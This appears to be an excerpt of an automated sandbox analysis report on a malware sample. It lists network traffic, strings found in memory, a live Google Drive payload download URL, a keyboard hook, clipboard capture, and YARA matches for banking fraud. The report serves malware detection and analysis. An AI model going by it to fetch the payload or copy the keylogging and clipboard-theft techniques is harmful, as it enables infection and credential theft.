Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGNGNsLEGIjD9G5xmGH5ri1rv3DQ5wOXVjujAbZEINLE1ZHU1KvNcD8D04QZH5XmP2eIPYJfEfjEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-19; NID=513=e70pJcXp308g-zLvKr2jNfzlf1AWbQuxx93QyO1wlh747mGP0eLOjf7jkr_UXszPZPorC5RVMqJTvYbevYSerH_RLBZfC-j1bqwdBhdxbbGX0EyDoh3X-F2jSKf5iG07WXr7mZ4q9rkgKDP5hh0YZnm2e-fmfcH5KsRunNsMzjo
Source: global traffic	HTTP traffic detected: GET /api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/1.1Accept-Encoding: gzip, deflateHost: cxcs.microsoft.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DTLaKFkphhrsh9g&MD=4mKMnfvA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DTLaKFkphhrsh9g&MD=4mKMnfvA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: www.pentegrasystem.com
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 26Date: Fri, 26 Apr 2024 19:56:05 GMTConnection: close

Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: xkn.exe, 00000009.00000002.2186571233.0000015A4AE96000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: kn.exe	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/user
Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2323628754.0000000000837000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, Kpeyvroh.PIF	String found in binary or memory: http://geoplugin.net/json.gp
Source: sppsvc.pif, 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp2BF
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpK0r
Source: sppsvc.pif, 0000001C.00000003.2323628754.0000000000837000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpa
Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpoft
Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpthority
Source: xkn.exe, 00000009.00000002.2180228886.0000015A42F66000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2180228886.0000015A42E2F000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: xkn.exe, 00000009.00000002.2094439063.0000015A32DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: Kpeyvroh.PIF, Kpeyvroh.PIF, 00000024.00000002.2421237324.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2465696824.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: kn.exe	String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr	String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
Source: xkn.exe, 00000009.00000002.2094439063.0000015A32DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: sppsvc.pif, 0000001C.00000002.4519735851.000000001A71D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?expo
Source: sppsvc.pif, 0000001C.00000002.4519735851.000000001A700000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB
Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4502894836.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/6
Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094405950.0000000000796000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=download
Source: sppsvc.pif, 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com:443/download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=downlo
Source: kn.exe	String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
Source: kn.exe	String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
Source: kn.exe	String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: kn.exe	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
Source: kn.exe	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
Source: SystemSettingsAdminFlows.exe, 00000013.00000002.4501063823.000001C6008E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.local
Source: xkn.exe, 00000009.00000002.2180228886.0000015A42F66000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2180228886.0000015A42E2F000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: unknown	HTTPS traffic detected: 23.35.153.42:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.217.193:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49732 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_1B9FA2B8 SetWindowsHookExA 0000000D,1B9FA2A4,00000000

28_2_1B9FA2B8

Source: C:\Users\Public\Libraries\sppsvc.pif

Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\sppsvc.pif

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_1B9FB70E OpenClipboard,GetClipboardData,CloseClipboard,

28_2_1B9FB70E

Source: C:\Users\Public\Libraries\Kpeyvroh.PIF

Code function: 36_2_210768C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

36_2_210768C1

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_1B9FB70E OpenClipboard,GetClipboardData,CloseClipboard,

28_2_1B9FB70E

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_1B9FA3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

28_2_1B9FA3E0

Source: Yara match

File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR

E-Banking Fraud

Source: Yara match	File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
